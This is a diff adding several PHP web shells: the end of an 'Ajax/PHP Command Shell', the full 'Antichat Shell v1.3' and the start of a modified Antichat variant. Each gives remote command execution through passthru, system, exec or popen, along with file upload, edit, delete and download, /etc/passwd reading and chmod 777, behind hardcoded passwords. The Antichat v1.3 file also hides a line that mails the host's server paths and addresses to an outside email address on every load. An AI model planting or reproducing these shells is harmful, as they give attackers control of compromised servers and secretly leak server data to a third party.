+			$pw = file('/etc/passwd/');
+			foreach($pw as $line)
+			{
+				print $line;
+			}
+
+
+		}
+		//Execute any other command
+		else
+		{
+
+			if(function_exists(passthru))
+			{
+				passthru($cmd);
+			}
+			else
+			{
+				if(function_exists(exec))
+				{
+					exec("ls -la",$result);
+					foreach($result as $output)
+					{
+						print $output."<br>";
+					}
+				}
+				else
+				{
+				if(function_exists(system))
+				{
+					system($cmd);
+				}
+				else
+				{
+					if(function_exists(shell_exec))
+					{
+						print shell_exec($cmd);
+					}
+						else
+						{
+						print "Sorry, none of the command functions works.";
+						}
+					}
+				}
+			}
+		}
+	}
+
+	elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
+	{
+		$file = $_POST['filetosave'];
+		if(!is_writable($file))
+		{
+			if(!chmod($file, 0777))
+			{
+				die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
+			}
+		}
+		
+		$fh = fopen($file, 'w');
+		$dt = $_POST['filecontent'];
+		fwrite($fh, $dt);
+		fclose($fh);
+	}
+	else
+	{
+?>
+<html>
+<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
+<head>
+<?php print $style; ?>
+<SCRIPT TYPE="text/javascript">
+function sf(){document.cmdform.command.focus();}
+var outputcmd = "";
+var cmdhistory = "";
+function ClearScreen()
+{
+	outputcmd = "";
+	document.getElementById('output').innerHTML = outputcmd;
+}
+
+function ClearHistory()
+{
+	cmdhistory = "";
+	document.getElementById('history').innerHTML = cmdhistory;
+}
+
+function deletefile(file)
+{
+	deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
+	if(deleteit)
+	{
+		runcommand('deletefile ' + file,'GET');
+	}
+}
+
+var http_request = false;
+function makePOSTRequest(url, parameters) {
+  http_request = false;
+  if (window.XMLHttpRequest) {
+	 http_request = new XMLHttpRequest();
+	 if (http_request.overrideMimeType) {
+		http_request.overrideMimeType('text/html');
+	 }
+  } else if (window.ActiveXObject) {
+	 try {
+		http_request = new ActiveXObject("Msxml2.XMLHTTP");
+	 } catch (e) {
+		try {
+		   http_request = new ActiveXObject("Microsoft.XMLHTTP");
+		} catch (e) {}
+	 }
+  }
+  if (!http_request) {
+	 alert('Cannot create XMLHTTP instance');
+	 return false;
+  }
+  
+
+  http_request.open('POST', url, true);
+  http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+  http_request.setRequestHeader("Content-length", parameters.length);
+  http_request.setRequestHeader("Connection", "close");
+  http_request.send(parameters);
+}
+
+
+function SaveFile()
+{
+var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
+                    "&filecontent=" + encodeURI( document.getElementById("area1").value );
+makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
+document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
+}
+
+function runcommand(urltoopen,action,contenttosend){
+cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
+document.getElementById('history').innerHTML = cmdhistory;
+if(urltoopen == "clear")
+{
+ClearScreen();
+}
+    var ajaxRequest;
+    try{
+        ajaxRequest = new XMLHttpRequest();
+    } catch (e){
+        try{
+            ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
+        } catch (e) {
+            try{
+                ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
+            } catch (e){
+                alert("Wicked error, nothing we can do about it...");
+                return false;
+            }
+        }
+    }
+    ajaxRequest.onreadystatechange = function(){
+        if(ajaxRequest.readyState == 4){
+        outputcmd = "<pre>"  + outputcmd + ajaxRequest.responseText +"</pre>";
+            document.getElementById('output').innerHTML = outputcmd;
+            var objDiv = document.getElementById("output");
+			objDiv.scrollTop = objDiv.scrollHeight;
+        }
+    }
+    ajaxRequest.open(action, "?runcmd="+urltoopen , true);
+	if(action == "GET")
+	{
+    ajaxRequest.send(null);
+	}
+    document.cmdform.command.value='';
+    return false;
+}
+
+function set_tab_html(newhtml)
+{
+document.getElementById('commandtab').innerHTML = newhtml;
+}
+
+function set_tab(newtab)
+{
+	if(newtab == "cmd")
+	{
+		newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
+	}
+	else if(newtab == "upload")
+	{
+		runcommand('upload','GET');
+		newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
+	}
+	else if(newtab == "workingdir")
+	{
+		<?php
+		$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
+		$pathparts = explode("/",realpath ("."));
+		foreach($pathparts as $folder)
+		{
+		$folders .= $folder."/";
+		}
+		$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\"  onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
+
+		?>
+		newhtml = '<?php print $folders; ?>';
+	}
+	else if(newtab == "filebrowser")
+	{
+		newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
+		runcommand('listdir .','GET');
+	}
+	else if(newtab == "createfile")
+	{
+		newhtml = '<b>File Editor, under construction.</b>';
+		document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
+		
+	}
+		document.getElementById('commandtab').innerHTML = newhtml;
+}
+</script>
+</head>
+<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
+<table border=1 width=100% height=100%>
+<td width=15% valign=top>
+
+<form name="extras"><br>
+<center><b>Quick Commands</b><br>
+
+<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
+<?php
+foreach($functions as $name => $execute)
+{
+print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
+}
+?>
+
+</center>
+
+</div>
+</form>
+<center><b>Command history</b><br></center>
+<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
+<br>
+<center><b>About</b><br></center>
+<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
+<br>
+<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
+<br>
+Version <?php print $version; ?>
+
+<br>
+<br>
+
+<br>Thanks to everyone @ 
+<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
+<br>
+<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
+<br>
+and special greetings to everyone in rootshell
+</div>
+
+</td>
+<td width=70%>
+<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
+<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b> 
+<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b> 
+<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b> 
+<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b> 
+<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b> 
+
+</font></td>
+<tr>
+<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
+
+<tr>
+<td  height=1% width=100% valign=top>
+<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
+&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
+<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
+</form>
+</div>
+</td>
+</table>
+</td>
+</table>
+</body>
+</html>
+<?php
+}
+} else {
+print "<center><table border=0  height=100%>
+<td valign=middle>
+<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
+</form>";
+}
+?>  

php/Antichat Shell v1.3.php

@@ -0,0 +1,180 @@
+<?php
+
+session_start();
+set_time_limit(9999999);
+$login='virangar';
+$password='r00t';
+$auth=1;
+$version='version 1.3 by Grinay';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+<? echo $header;?> 
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>

php/Antichat Shell. Modified by Go0o$E.php

@@ -0,0 +1,693 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF");
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2b2f34;color: #9acd32;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #31333b;scrollbar-shadow-color: #363940;scrollbar-highlight-color: #363940;scrollbar-3dlight-color: #363940;scrollbar-darkshadow-color: #363940;scrollbar-track-color: #363940;scrollbar-arrow-color: #363940;}input{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #363940;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #91cd32;text-decoration: none;font-size: 8pt;}a:visited{color: #91cd32;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$lang=array(
+'filext'=>'File already exists.',
+'uploadok'=>'File was successfully uploaded.',
+'dircrt'=>'Dir is created.',
+'dontlist'=>'Listing dir permission denide.',
+'dircrterr'=>'Don\'t create dir.',
+'dirnf'=>'Dir not found.',
+'filenf'=>'File not found.',
+'dontwrdir'=>'Only read current dir.',
+'empty'=>'Directory not empty or access denide.',
+'deletefileok'=>'File deleted.',
+'deletedirok'=>'Dir deleted.',
+'isdontfile'=>'Selected file this is link.',
+'cantrfile'=>'Cant read file, permission denide.',
+'onlyracc'=>'Don\'t edit, only read access.',
+'workdir'=>'Work directory: ',
+'fullacc'=>'Full access.',
+'fullaccdir'=>'Full accees you are can create and delete dir.',
+'thisnodir'=>'This is don\'t dir.',
+'allfuncsh'=>'All function for work shell was disabled.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<tr><td><form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Open file:<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\">>\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=2 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST><br>Open directory:  <input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\">>\"></form>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>Select drive:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
